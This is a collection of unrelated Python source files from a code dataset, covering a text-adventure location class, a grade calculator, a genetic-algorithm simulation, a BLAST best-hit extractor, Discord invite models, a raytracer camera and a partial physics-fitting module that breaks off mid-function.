+{"seq_id":"393450684","text":"class Location:\r\n\t#constructor\r\n\tdef __init__(self,\r\n\t name:str,\r\n\t description:str,\r\n\t to_north:str = \"\",\r\n\t to_east:str = \"\",\r\n\t to_south:str = \"\",\r\n\t to_west:str = \"\",\r\n\t items:list = [],\r\n\t item_required:str = \"\"):\r\n\t\t\r\n\t\tself._name:str = name\r\n\t\tself._description:str = description\r\n\t\tself._to_north:str = to_north\r\n\t\tself._to_east:str = to_east\r\n\t\tself._to_south:str = to_south\r\n\t\tself._to_west:str = to_west\r\n\t\tself._items:list = items\r\n\t\tself._item_required:str = item_required\r\n\t\t\r\n\t# properties\r\n\t@property\r\n\tdef name(self) -> str:\r\n\t\treturn self._name\r\n\r\n\t@property\r\n\tdef description(self) -> str:\r\n\t\treturn self._description\r\n\r\n\t@property\r\n\tdef to_north(self) -> str:\r\n\t\treturn self._to_north\r\n\r\n\t@property\r\n\tdef to_east(self) -> str:\r\n\t\treturn self._to_east\r\n\r\n\t@property\r\n\tdef to_south(self) -> str:\r\n\t\treturn self._to_south\r\n\r\n\t@property\r\n\tdef to_west(self) -> str:\r\n\t\treturn self._to_west\r\n\t\r\n\t@property\r\n\tdef items(self) ->list:\r\n\t\t''' return a list of all items in this location '''\r\n\t\treturn self._items\r\n\t\r\n\t@items.setter\r\n\tdef items(self, list_of_items:list) -> None:\r\n\t\t''' allows items in this location to be set in bulk '''\r\n\t\t# list_of_items is a list of dictionary keys sent as\r\n\t\t# [\"torch\", \"key\"]\r\n\t\tself._items = list_of_items\t\r\n\t\r\n\t@property\r\n\tdef item_required(self) -> str:\r\n\t\t''' return item required to enter this location '''\r\n\t\treturn self._item_required \r\n\t\r\n\t@item_required.setter\t\t\r\n\tdef item_required(self, value:str) -> None:\r\n\t\t''' set the item required to enter this location '''\r\n\t\tself._item_required = value\t\r\n\t\r\n\t# methods\r\n\tdef add_item(self, item_key:str) -> None:\r\n\t\t''' add an item to the list of items in this location '''\r\n\t\tif item_key not in self._items:\r\n\t\t\tself._items.append(item_key)\r\n\t\r\n\tdef get_items_count(self) -> int:\r\n\t\t''' return no. 
of items in this location '''\r\n\t\treturn len(self._items) \r\n\t\t\t\r\n\tdef location_dict(self) -> dict:\r\n\t\t''' return a dictionary of surrounding locations '''\r\n\t\treturn {'n':self._to_north, 'e':self._to_east, 's':self._to_south, 'w':self._to_west} # Dictionary of strings\t\r\n\t\t \r\n\tdef location_list(self) -> list:\r\n\t\t''' return a list of surrounding locations '''\r\n\t\treturn [self._to_north, self._to_east, self._to_south, self._to_west] # List of strings\r\n\t\r\n\tdef remove_item(self, item_key:str) -> None:\r\n\t\t''' removes an item from list of items in this location '''\r\n\t\tif item_key in self._items:\r\n\t\t\tself._items.remove(item_key)\r\n\t\t\r\n\tdef set_locations(self, to_north:str, to_east:str, to_south:str, to_west:str) -> None:\r\n\t\t''' allows surrounding locations to be changed '''\r\n\t\t#self-corrects for spaces e.g \" \" = \"\", \"room \" = \"room\"\r\n\t\tself._to_north = to_north.strip()\r\n\t\tself._to_east = to_east.strip()\r\n\t\tself._to_south = to_south.strip()\r\n\t\tself._to_west = to_west.strip()\r\n\t\r\n\tdef display_location(self) -> list:\r\n\t\t''' describe the current location, any items inside it, and exits '''\r\n\t\texits:list = []\r\n\t\tif self._to_north != \"\":\r\n\t\t\texits.append(\"north\")\r\n\t\tif self._to_east != \"\":\r\n\t\t\texits.append(\"east\")\r\n\t\tif self._to_south != \"\":\r\n\t\t\texits.append(\"south\")\r\n\t\tif self._to_west != \"\":\r\n\t\t\texits.append(\"west\")\t\t\t\t\r\n\t\r\n\t\tprint(f\"You are in {self._description}\")\r\n\t\tif len(exits) > 0:\r\n\t\t\toutput:str = \"There are exits: \"\r\n\t\t\tfor exit in exits:\r\n\t\t\t\toutput += exit + \", \"\r\n\t\t\toutput = output.strip()[:-1] # remove comma\r\n\t\telse:\r\n\t\t\toutput = \"There are no exits\"\r\n\t\tprint(output)\r\n\t\r\n\t\tif len(self._items) > 0:\r\n\t\t\toutput = \"In this location there is: \"\r\n\t\t\tfor item in self._items:\r\n\t\t\t\toutput += item + \", \"\r\n\t\t\toutput = output.strip()[:-1] # remove comma\r\n\t\t\tprint(output)\r\n\t\r\n\t\treturn exits\t","sub_path":"Python/OOP/05-Adventure Game+weapon/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
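A short usage sketch of the `Location` class above: two rooms joined east/west with one item to pick up (room and item names are illustrative):

```python
hall = Location("hall", "a dusty hall", to_east="kitchen", items=["torch"])
kitchen = Location("kitchen", "a small kitchen", to_west="hall")

exits = hall.display_location()  # prints description, exits and items
print(exits)                     # ['east']
hall.remove_item("torch")        # the player picks up the torch
print(hall.get_items_count())    # 0
print(kitchen.location_dict())   # {'n': '', 'e': '', 's': '', 'w': 'hall'}
```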
+{"seq_id":"332043540","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 28 11:37:16 2020\r\n\r\n@author: Ashish\r\n\r\nUse the logic for assigning grade to student defined in\r\nassign_grade_to_student_using_function.py script.\r\nThe idea is to create a class with a constructor to initialise\r\nrelevant variables like student exam related data from the user,\r\nroll number, test mark, exam mark etc.\r\nIt will then pass this data as argument into another function.\r\nThe other function will pull the data out of the arguments\r\nand use them for further analysis.\r\n\r\nNote: the __init__() is a constructor to initialise variables\r\n\r\n\"\"\"\r\n\r\nstudent_info_list = []\r\n\r\n\r\nclass GradeAssigner:\r\n\r\n def __init__(self):\r\n print(\"The init is called\")\r\n # self.test_mark = test_mark\r\n # self.tut_mark = tut_mark\r\n # self.exam_mark = exam_mark\r\n\r\n def get_student_details(self):\r\n stud_num = input(\"Enter the student number: \")\r\n stud_tutorial_mark = float(input(\"Enter student's tutorial mark:\"))\r\n stud_test_mark = float(input(\"Enter student's test mark:\"))\r\n stud_exam_mark = float(input(\"Enter student exam mark: \"))\r\n # add data to list\r\n student_info_list.append(stud_num)\r\n student_info_list.append(stud_tutorial_mark)\r\n student_info_list.append(stud_test_mark)\r\n student_info_list.append(stud_exam_mark)\r\n # return a list of items\r\n return student_info_list\r\n\r\n def calculate_grade(self, student_info_list):\r\n stud_num = student_info_list[0]\r\n stud_test_mark = student_info_list[1]\r\n stud_tutorial_mark = student_info_list[2]\r\n stud_exam_mark = student_info_list[3]\r\n if stud_tutorial_mark+stud_test_mark/2 < 40:\r\n grade = \"Fail\"\r\n final_mark = (stud_tutorial_mark+stud_test_mark+2*stud_exam_mark)/4\r\n if 80 <= final_mark <= 100:\r\n grade = \"A\"\r\n elif 70 <= final_mark < 80:\r\n grade = \"B\"\r\n elif 60 <= final_mark < 70:\r\n grade = \"C\"\r\n elif 50 <= final_mark < 60:\r\n grade = \"D\"\r\n else:\r\n grade = \"E\"\r\n return stud_num, final_mark, grade\r\n\r\n\r\n# student = GradeAssigner() # create an object of the class\r\nstudent = GradeAssigner()\r\nget_student_info = student.get_student_details()\r\nsnum, fmark, grade = student.calculate_grade(get_student_info)\r\nprint(\"student %s's final mark is %d and grade is %s.\" % (snum, fmark, grade))\r\n","sub_path":"scripts/fundamentals/cls_student_grade_assigner.py","file_name":"cls_student_grade_assigner.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"510226629","text":"import pygame\r\nimport random\r\nimport math\r\n\r\nfrom Dot import Dot\r\nfrom Environment import Environment\r\n\r\n\r\nclass Population:\r\n \"\"\"\r\n Population class.\r\n Consists of Dots used for the simulation.\r\n\r\n :param size: Quantity of dots.\r\n :type size: int\r\n\r\n :param env: Environment that population is working in.\r\n :type env: Environment\r\n \"\"\"\r\n def __init__(self, size, env):\r\n self.POPULATION_SIZE = size\r\n self.ENV = env\r\n self.POSSIBLE_STEPS = env.SCREEN_SIZE_X * env.SCREEN_SIZE_Y\r\n\r\n self.samples = []\r\n self.fitness_sum = 0\r\n self.generation = 1\r\n self.best_dot = 0\r\n self.min_step = self.POSSIBLE_STEPS\r\n\r\n Dot.dead = 0\r\n\r\n for i in range(self.POPULATION_SIZE):\r\n self.samples.append(Dot(self.ENV.START_POINT))\r\n \r\n\r\n def move_dots(self):\r\n \"\"\"\r\n Moves a dot in the simulation environment.\r\n \"\"\"\r\n for dot in self.samples:\r\n dot.make_decision(self.ENV, self.POSSIBLE_STEPS)\r\n \r\n\r\n def extinct(self):\r\n \"\"\"\r\n Determines whether all the dots in the population are dead.\r\n\r\n\t:return: Whether a population of dots are dead.\r\n\t:rtype: bool\r\n \"\"\"\r\n return Dot.dead == self.POPULATION_SIZE\r\n\r\n \r\n def perform_natural_selection(self):\r\n \"\"\"\r\n Assigns the best parent for the next generation based on the parent\r\n with the best fitness score.\r\n \"\"\"\r\n next_generation = [Dot(self.ENV.START_POINT)] * len(self.samples)\r\n\r\n self.set_best_dot()\r\n self.calculate_fitness_sum()\r\n\r\n next_generation[0] = self.samples[self.best_dot].make_baby(self.ENV.START_POINT)\r\n next_generation[0].most_fit = True\r\n\r\n for dot in range(1, len(next_generation)):\r\n #select parent\r\n parent = self.select_parent()\r\n\r\n #then get offspring\r\n next_generation[dot] = parent.make_baby(self.ENV.START_POINT)\r\n \r\n self.samples = next_generation\r\n self.generation += 1\r\n Dot.dead = 0\r\n self.fitness_sum = 0\r\n\r\n\r\n def calculate_fitness(self):\r\n \"\"\"\r\n Calculates the fitnes score of each dot.\r\n \"\"\"\r\n for dot in self.samples:\r\n dot.calculate_fitness(self.ENV) \r\n\r\n\r\n def calculate_fitness_sum(self):\r\n \"\"\"\r\n Calculates the fitness sum for all the dots in the population.\r\n This will be used to determine the best parent.\r\n \"\"\"\r\n self.fitness_sum = 0\r\n for dot in self.samples:\r\n self.fitness_sum += dot.fitness\r\n \r\n\r\n def select_parent(self):\r\n \"\"\"\r\n Selects a parent for the next generation based on the best fitness score.\r\n\r\n\t:return: The best performing dot.\r\n\t:rtype: Dot\r\n \"\"\"\r\n rand = random.uniform(0, self.fitness_sum)\r\n\r\n running_sum = 0\r\n for dot in self.samples:\r\n running_sum += dot.fitness\r\n if running_sum > rand:\r\n return dot\r\n\r\n\r\n def mutate_babies(self):\r\n \"\"\"\r\n Mutates all of the next generation of dots.\r\n Note: The most fit dot of the previous generation is immortal and moved\r\n into the next generation without mutating, hence the range(1,...).\r\n \"\"\"\r\n for dot in range(1, len(self.samples)):\r\n self.samples[dot].genetics.mutate()\r\n\r\n\r\n def set_best_dot(self):\r\n \"\"\"\r\n Select the best performing dot out of a generation. 
\r\n The most 'fit' dot is defined as one that has the highest fitness score\r\n and the least amount of steps taken to get to the goal (or as close to).\r\n \"\"\"\r\n max_fitness = 0.0 \r\n max_idx = 0\r\n for d in range(len(self.samples)):\r\n if self.samples[d].fitness > max_fitness:\r\n max_fitness = self.samples[d].fitness\r\n max_idx = d\r\n \r\n self.best_dot = max_idx\r\n \r\n if self.samples[self.best_dot].goal_found:\r\n min_step = self.samples[self.best_dot].genetics.step\r\n self.min_step = min_step\r\n\r\n\r\n","sub_path":"src/Population.py","file_name":"Population.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"567272293","text":"import os\n\nPATH = \"F:\\Sonya\\GeekBrains\\\\01_python_basics\\\\venv\"\nall_sizes = {100: 0, 1000: 0, 10000: 0, 100_000: 0, 1_000_000: 0, 10_000_000: 0}\ni = 0\nfor root, dirs, files in os.walk(PATH):\n for file in files:\n f_path = os.path.join(root, file)\n size = os.stat(f_path).st_size\n file_extension = file.split('.')[-1]\n # print(file, file_extension, size)\n\n if size > 10_000_000:\n all_sizes[10_000_000] = all_sizes[10_000_000] + 1\n\n else:\n for template_size in all_sizes.keys():\n if size < template_size:\n all_sizes[template_size] = all_sizes[template_size] + 1\n break\nprint(all_sizes)\nresult_sum = 0\nfor count in all_sizes.values():\n result_sum += count\nprint(result_sum)\n","sub_path":"lesson_07/dz_04.py","file_name":"dz_04.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"601150793","text":"#!/usr/bin/env python\n\n\"\"\"\nHomoloGene App Template\nshould be copied and used for all HomoloGene apps\n* step 1\n* step 2\n* step 3\noutput:\n\"\"\"\n\n#\n# Author: David Managadze\n#\n\n\n# region: imports\nfrom sys import argv\nfrom os import path\nfrom sqlite3 import connect\n\nfrom hgappcommon import hg_bootstrap, HGApp\nfrom homologene.lib.shell import move_dir, remove\n\nhg_bootstrap() # find and add HomoloGene source root to the system path\nfrom homologene.lib.build import HGBuild\n\n# endregion\n\n# region: constants\n\n# endregion\n\n# region: variables\n\n# endregion\n\n\n\n\n\nclass my_app(HGApp):\n \"\"\"\n App class, inherits from HGApp class\n \"\"\"\n\n def blast_best_hits(self, fin):\n \"\"\"\n read input file, return generator of best (first) blast hits\n :param fin: input file name\n :type fin: str\n :return: best blast hits\n :rtype: generator(hits)\n \"\"\"\n seen = dict()\n fh = open(fin)\n for line in fh:\n line = line.strip()\n if line == '' or line.startswith('#'): continue\n key, val = line.split('\\t', 1)\n if key not in seen: # this is new query ID, i.e. best hit\n seen[key] = val\n yield line\n\n def extract_bb_hits(self, tid1, tid2, fin1, fin2):\n \"\"\"\n extract bidirectional best hits from two files\n :param fin1:\n :type fin1:\n :param fin2:\n :type fin2:\n :return:\n :rtype:\n \"\"\"\n self.log_info(\"* extracting BBH from files:\")\n self.log_info(\" o file1:\", fin1 )\n self.log_info(\" o file2:\", fin2)\n # read query,subject of the best hits in the first file into dict\n hits1 = dict()\n for hit in self.blast_best_hits(fin1):\n query, subject, rest = hit.split('\\t', 2)\n # print \"file1\", query, subject\n hits1[query] = subject\n for hit in self.blast_best_hits(fin2):\n query, subject, rest = hit.split('\\t', 2)\n # print \"file2\", query, subject\n if hits1.get(subject,'') == query:\n # self.log_info(\" + found BBH: taxid1:\", query, \"taxid2:\", subject)\n yield tid1, tid2, subject, query\n\n\n\n def init(self):\n \"\"\"\n initialize application: add commandline parameters, check input, set variables etc\n \"\"\"\n self.arg_parser.add_argument(\"-b\", \"--build\", help=\"build directory\")\n self.arg_parser.add_argument(\"-i\", \"--input\", help=\"directory of input fasta files\")\n\n # mandatory! 
this must be *after* all the arguments\n        self.post_init()\n\n        if not path.exists(self.args.input):\n            self.die(\"input path does not exist: \", self.args.input)\n        if not path.exists(self.args.build):\n            self.die(\"build path does not exist: \", self.args.build)\n\n        # create tmp output directories\n        # self.dir_tmp_tree = path.join(self.dir_tmp, \"tree\")\n        # make_dir(self.dir_tmp_tree)\n\n        # create connection to db\n        self._dbf = path.join(self.dir_tmp, \"bbh.db\")\n        self._dbconn = connect(self._dbf)\n        self._dbcursor = self._dbconn.cursor()\n        self._dbcursor.execute(\"DROP TABLE IF EXISTS bbh;\")\n        self._dbcursor.execute(\"CREATE TABLE bbh(tax_id1 int, tax_id2 int, acc_ver1, acc_ver2);\")\n\n    def run(self):\n        build = HGBuild(self.args.build)\n        for tax_id1 in build.get_tax_info():\n            for tax_id2 in build.get_tax_info():\n                if tax_id1 == tax_id2: continue\n                # tax_id1 = 9606\n                # tax_id2 = 10090\n                fin1 = path.join(self.args.input, str(tax_id1) + \"_\" + str(tax_id2) + \".blastp.tab\")\n                fin2 = path.join(self.args.input, str(tax_id2) + \"_\" + str(tax_id1) + \".blastp.tab\")\n                # print tax_id1, tax_id2\n                if not path.isfile(fin1):\n                    self.die(\"input file does not exist: \", fin1)\n                if not path.isfile(fin2):\n                    self.die(\"input file does not exist: \", fin2)\n                for bbh_pair in self.extract_bb_hits(tax_id1, tax_id2, fin1, fin2):\n                    # print bbh_pair\n                    self._dbcursor.execute(\"INSERT INTO bbh VALUES (?,?,?,?);\", bbh_pair)\n\n    def exit(self):\n        self.log_info(\"* indexing database\")\n        self._dbcursor.execute(\"CREATE INDEX bbh_tid1 ON bbh(tax_id1);\")\n        self._dbcursor.execute(\"CREATE INDEX bbh_tid2 ON bbh(tax_id2);\")\n        self._dbcursor.execute(\"CREATE INDEX bbh_acc1 ON bbh(acc_ver1);\")\n        self._dbcursor.execute(\"CREATE INDEX bbh_acc2 ON bbh(acc_ver2);\")\n        self._dbconn.commit()\n        self._dbconn.close()\n        self.log_info(\"* cleaning up\")\n        self.log_info(\" - moving\", self._dbf, \"to:\", self.dir_out)\n        move_dir(self._dbf, self.dir_out)\n        self.log_info(\" - removing\", self.dir_tmp)\n        remove(self.dir_tmp)\n        self.log_info(\"\\n# --- FINISHED --- #\\n\")\n\n\n\n\nif __name__ == \"__main__\":\n    my_app.main(argv=argv, name='my_app_name', version='0.1', logmode='debug', conf=\"conf/homologene.conf\")\n\n","sub_path":"extract_bbh.py","file_name":"extract_bbh.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"377737349","text":"import math\nfrom vec3 import vec3\nfrom ray import ray\n\nclass camera:\n\tdef __init__(self, lookFrom, lookAt, vUp, fovy, aspectRatio, aperture, distToFocus):\n\t\tself.lookFrom = lookFrom\n\t\tself.lookAt = lookAt\n\t\tself.vUp = vUp\n\t\tself.fovy = math.radians(fovy)\n\t\tself.aspectRatio = aspectRatio\n\t\tself.lenseRadius = aperture/2\n\t\tself.distToFocus = distToFocus\n\t\t\n\t\tself.halfHeight = math.tan(self.fovy/2) * distToFocus\n\t\tself.halfWidth = self.halfHeight * aspectRatio\n\t\t\n\t\tself.w = vec3.normalize(lookAt-lookFrom)\n\t\tself.u = vec3.normalize(vec3.cross(self.w,vUp))\n\t\tself.v = vec3.cross(self.u,self.w)\n\n\t\tself.lowerLeftCorner = lookFrom + self.w*distToFocus - self.v*self.halfHeight - self.u*self.halfWidth\t\t\n\t\t\n\tdef getRay(self, u, v):\t\t\n\t\ttemp = vec3.randomPointInDisc() * self.lenseRadius\n\t\tapertureOffset = self.u * temp.x() + self.v * temp.y()\n\t\treturn ray(self.lookFrom + apertureOffset, self.lowerLeftCorner + self.u*u*2*self.halfWidth + self.v*v*2*self.halfHeight - (self.lookFrom + apertureOffset))","sub_path":"py/rt/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"403427775","text":"from .base import DiscordObject\nfrom .guild import Guild\nfrom .channel import Channel\nfrom .user import User\n\n\nclass Invite(DiscordObject):\n \"\"\"Represents a code that when used, adds a user to a guild.\n\n .. versionadded:: 0.2.0\n\n Attributes:\n code (:obj:`str`): the invite code (unique ID)\n guild (:class:`.Guild`): the guild this invite is for\n channel (:class:`.Channel`): the channel this invite is for\n \"\"\"\n\n def __init__(self, code=\"\", guild=None, channel=None):\n self.code = code\n self.guild = guild\n self.channel = channel\n\n async def _from_api_ext(self, key, value):\n if key == 'guild':\n setattr(self, key, await Guild.from_api_res(value))\n elif key == 'channel':\n setattr(self, key, await Channel.from_api_res(value))\n else:\n return await super()._from_api_ext(key, value)\n\n\nclass InviteMetadata(DiscordObject):\n \"\"\"Represents the invite metadata\n\n .. versionadded:: 0.2.0\n\n Attributes:\n inviter (:class:`.A`): user object user who created the invite\n uses (:obj:`int`): number of times this invite has been used\n max_uses (:obj:`int`): max number of times this invite can be used\n max_age (:obj:`int`): duration (in seconds) after which the invite expires\n temporary (:obj:`bool`): whether this invite only grants temporary membership\n created_at (:obj:`int`): timestamp when this invite was created\n revoked (:obj:`bool`): whether this invite is revoked\n \"\"\"\n\n def __init__(self, inviter=None, uses=0, max_uses=0, max_age=0, temporary=False,\n created_at=None, revoked=False):\n self.inviter = inviter\n self.uses = uses\n self.max_uses = max_uses\n self.max_age = max_age\n self.temporary = temporary\n self.created_at = created_at\n self.revoked = revoked\n\n async def _from_api_ext(self, key, value):\n if key == 'inviter':\n setattr(self, key, await User.from_api_res(value))\n else:\n return await super()._from_api_ext(key, value)\n\n\n__all__ = [\n 'Invite',\n 'InviteMetadata',\n]\n","sub_path":"discordaio/invite.py","file_name":"invite.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"408551025","text":"import math\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\nfrom math import floor, log10\n\nimport numpy as np\n\nimport pandas as pd\nimport uproot\nimport xgboost as xgb\nfrom hipe4ml.model_handler import ModelHandler\nimport ROOT\nfrom ROOT import (TF1, TH1D, TH2D, TH3D, TCanvas, TPaveStats, TPaveText, gStyle)\n\nfrom root_numpy import array2tree\n\ndef get_skimmed_large_data(data_path, cent_classes, pt_bins, ct_bins, training_columns, application_columns, mode, split):\n print('\\n++++++++++++++++++++++++++++++++++++++++++++++++++')\n print ('\\nStarting BDT appplication on large data')\n\n if mode == 3:\n handlers_path = os.environ['HYPERML_MODELS_3'] + '/handlers'\n efficiencies_path = os.environ['HYPERML_EFFICIENCIES_3']\n\n if mode == 2:\n handlers_path = os.environ['HYPERML_MODELS_2'] + '/handlers'\n efficiencies_path = os.environ['HYPERML_EFFICIENCIES_2']\n\n executor = ThreadPoolExecutor(8)\n iterator = uproot.pandas.iterate(data_path, 'DataTable', executor=executor, reportfile=True)\n\n df_applied = pd.DataFrame()\n\n for current_file, data in iterator:\n\n rename_df_columns(data)\n \n print('current file: {}'.format(current_file))\n print ('start entry chunk: {}, stop entry chunk: {}'.format(data.index[0], data.index[-1]))\n \n for cclass in cent_classes:\n for ptbin in zip(pt_bins[:-1], pt_bins[1:]):\n for ctbin in zip(ct_bins[:-1], ct_bins[1:]):\n info_string = '_{}{}_{}{}_{}{}'.format(cclass[0], cclass[1], ptbin[0], ptbin[1], ctbin[0], ctbin[1])\n\n filename_handler = handlers_path + '/model_handler' + info_string + split +'.pkl'\n filename_efficiencies = efficiencies_path + '/Eff_Score' + info_string + split +'.npy'\n\n model_handler = ModelHandler()\n model_handler.load_model_handler(filename_handler)\n\n eff_score_array = np.load(filename_efficiencies)\n tsd = eff_score_array[1][-1]\n\n data_range = f'{ctbin[0]}@tsd')\n df_tmp = df_tmp[application_columns]\n\n df_applied = df_applied.append(df_tmp, ignore_index=True, sort=False)\n\n print(df_applied.info(memory_usage='deep'))\n return df_applied\n \n\ndef expected_signal_counts(bw, cent_range, pt_range, eff, nevents, n_body=2):\n correction = 0.4 # Very optimistic, considering it constant with centrality\n\n if n_body == 2:\n correction *= 0.25\n if n_body == 3:\n correction *= 0.4\n\n cent_bins = [10, 40, 90]\n\n signal = 0\n for cent in range(cent_range[0]+1, cent_range[1]):\n for index in range(0, 3):\n if cent < cent_bins[index]:\n signal = signal + \\\n nevents[cent] * \\\n bw[index].Integral(pt_range[0], pt_range[1], 1e-8)\n break\n\n return int(round(2*signal * eff * correction))\n\n\ndef significance_error(signal, background):\n signal_error = np.sqrt(signal + 1e-10)\n background_error = np.sqrt(background + 1e-10)\n\n sb = signal + background + 1e-10\n sb_sqrt = np.sqrt(sb)\n\n s_propag = (sb_sqrt + signal / (2 * sb_sqrt))/sb * signal_error\n b_propag = signal / (2 * sb_sqrt)/sb * background_error\n\n if signal+background == 0:\n return 0\n return np.sqrt(s_propag * s_propag + b_propag * b_propag)\n\n\ndef expo(x, tau):\n return np.exp(-x / (tau * 0.029979245800))\n\n\ndef h2_preselection_efficiency(ptbins, ctbins, name='PreselEff'):\n th2 = TH2D(name, ';#it{p}_{T} (GeV/#it{c});c#it{t} (cm);Preselection efficiency',\n len(ptbins) - 1, np.array(ptbins, 'double'), len(ctbins) - 1, np.array(ctbins, 'double'))\n th2.SetDirectory(0)\n\n return th2\n\n\ndef h2_generated(ptbins, ctbins, name='Generated'):\n th2 = TH2D(name, ';#it{p}_{T} (GeV/#it{c});c#it{t} (cm); 
Generated', len(ptbins)-1,\n np.array(ptbins, 'double'), len(ctbins) - 1, np.array(ctbins, 'double'))\n th2.SetDirectory(0)\n\n return th2\n\n\ndef h2_rawcounts(ptbins, ctbins, name='RawCounts', suffix=''):\n th2 = TH2D(f'{name}{suffix}', ';#it{p}_{T} (GeV/#it{c});c#it{t} (cm);Raw counts', len(ptbins)-1,\n np.array(ptbins, 'double'), len(ctbins) - 1, np.array(ctbins, 'double'))\n th2.SetDirectory(0)\n\n return th2\n\n\ndef h2_significance(ptbins, ctbins, name='Significance', suffix=''):\n th2 = TH2D(f'{name}{suffix}', ';#it{p}_{T} (GeV/#it{c});c#it{t} (cm);Significance', len(ptbins)-1,\n np.array(ptbins, 'double'), len(ctbins) - 1, np.array(ctbins, 'double'))\n th2.SetDirectory(0)\n\n return th2\n\n\ndef h1_invmass(counts, cent_class, pt_range, ct_range, bins=45, name=''):\n th1 = TH1D(f'ct{ct_range[0]}{ct_range[1]}_pT{pt_range[0]}{pt_range[1]}_cen{cent_class[0]}{cent_class[1]}_{name}', '', bins, 2.96, 3.05)\n\n for index in range(0, len(counts)):\n th1.SetBinContent(index+1, counts[index])\n th1.SetBinError(index + 1, math.sqrt(counts[index]))\n\n th1.SetDirectory(0)\n\n return th1\n\n\ndef round_to_error(x, error):\n return round(x, -int(floor(log10(abs(error)))))\n\n\ndef get_ptbin_index(th2, ptbin):\n return th2.GetXaxis().FindBin(0.5 * (ptbin[0] + ptbin[1]))\n\n\ndef get_ctbin_index(th2, ctbin):\n return th2.GetYaxis().FindBin(0.5 * (ctbin[0] + ctbin[1]))\n\n\ndef fit_hist(\n histo, cent_class, pt_range, ct_range, nsigma=3, model=\"pol2\", fixsigma=-1, sigma_limits=None, mode=3, split =''):\n # canvas for plotting the invariant mass distribution\n cv = TCanvas(f'cv_{histo.GetName()}')\n\n # define the number of parameters depending on the bkg model\n if 'pol' in str(model):\n n_bkgpars = int(model[3]) + 1\n elif 'expo' in str(model):\n n_bkgpars = 2\n else:\n print(f'Unsupported model {model}')\n\n # define the fit function bkg_model + gauss\n fit_tpl = TF1('fitTpl', f'{model}(0)+gausn({n_bkgpars})', 0, 5)\n if model=='2pol1':\n fit_tpl = TF1('fitTpl', f'[0]+[1]*x+[2]*exp(-(x-[3])*(x-[3])/(2*[4]*[4]))', 0, 5)\n elif model=='2pol2':\n fit_tpl = TF1('fitTpl', f'[0]*exp(-[1]*x)+[2]*exp(-(x-[3])*(x-[3])/(2*[4]*[4]))', 0, 5)\n elif model=='2expo':\n fit_tpl = TF1('fitTpl', f'[0]+[1]*x+[2]*x*x+[3]*exp(-(x-[4])*(x-[4])/(2*[5]*[5]))', 0, 5)\n \n # redefine parameter names for the bkg_model\n for i in range(n_bkgpars):\n fit_tpl.SetParName(i, f'B_{i}')\n\n # define parameter names for the signal fit\n fit_tpl.SetParName(n_bkgpars, 'N_{sig}')\n fit_tpl.SetParName(n_bkgpars + 1, '#mu')\n fit_tpl.SetParName(n_bkgpars + 2, '#sigma')\n # define parameter values and limits\n fit_tpl.SetParameter(n_bkgpars, 40)\n fit_tpl.SetParLimits(n_bkgpars, 0.001, 10000)\n fit_tpl.SetParameter(n_bkgpars + 1, 2.9913)\n fit_tpl.SetParLimits(n_bkgpars + 1, 2.9905, 2.9927)\n\n # define signal and bkg_model TF1 separately\n sigTpl = TF1('fitTpl', 'gausn(0)', 0, 5)\n #sigTpl= TF1('fitTpl', '[0]*exp(-(x-[1])*(x-[1])/(2*[2]*[2]))', 0, 5)\n bkg_tpl = TF1('fitTpl', f'{model}(0)', 0, 5)\n\n # plotting stuff for fit_tpl\n fit_tpl.SetNpx(300)\n fit_tpl.SetLineWidth(2)\n fit_tpl.SetLineColor(2)\n # plotting stuff for bkg model\n bkg_tpl.SetNpx(300)\n bkg_tpl.SetLineWidth(2)\n bkg_tpl.SetLineStyle(2)\n bkg_tpl.SetLineColor(2)\n\n # define limits for the sigma if provided\n if sigma_limits != None:\n fit_tpl.SetParameter(n_bkgpars + 2, 0.5 *\n (sigma_limits[0] + sigma_limits[1]))\n fit_tpl.SetParLimits(n_bkgpars + 2, sigma_limits[0], sigma_limits[1])\n fit_tpl.SetParameter(n_bkgpars + 1, 2.9913)\n fit_tpl.SetParLimits(n_bkgpars 
+ 1, 2.9905, 2.9925)\n # if the mc sigma is provided set the sigma to that value\n elif fixsigma > 0:\n fit_tpl.FixParameter(n_bkgpars + 2, fixsigma)\n # otherwise set sigma limits reasonably\n else:\n fit_tpl.SetParameter(n_bkgpars + 2, 0.002)\n fit_tpl.SetParLimits(n_bkgpars + 2, 0.001, 0.003)\n\n #print(fit_tpl.GetFormula())\n #x = input()\n ########################################\n # plotting the fits\n if mode == 2:\n ax_titles = ';m (^{3}He + #pi) (GeV/#it{c})^{2};Counts' + f' / {round(1000 * histo.GetBinWidth(1), 2)} MeV'\n if mode == 3:\n ax_titles = ';m (d + p + #pi) (GeV/#it{c})^{2};Counts' + f' / {round(1000 * histo.GetBinWidth(1), 2)} MeV'\n\n # invariant mass distribution histo and fit\n histo.UseCurrentStyle()\n histo.SetLineColor(1)\n histo.SetMarkerStyle(20)\n histo.SetMarkerColor(1)\n histo.SetTitle(ax_titles)\n histo.SetMaximum(1.5 * histo.GetMaximum())\n histo.Fit(fit_tpl, \"QRL\", \"\", 2.96, 3.05)\n\n histo.SetDrawOption(\"e\")\n histo.GetXaxis().SetRangeUser(2.96, 3.05)\n # represent the bkg_model separately\n bkg_tpl.SetParameters(fit_tpl.GetParameters())\n bkg_tpl.SetLineColor(600)\n bkg_tpl.SetLineStyle(2)\n bkg_tpl.Draw(\"same\")\n # represent the signal model separately\n sigTpl.SetParameter(0, fit_tpl.GetParameter(n_bkgpars))\n sigTpl.SetParameter(1, fit_tpl.GetParameter(n_bkgpars+1))\n 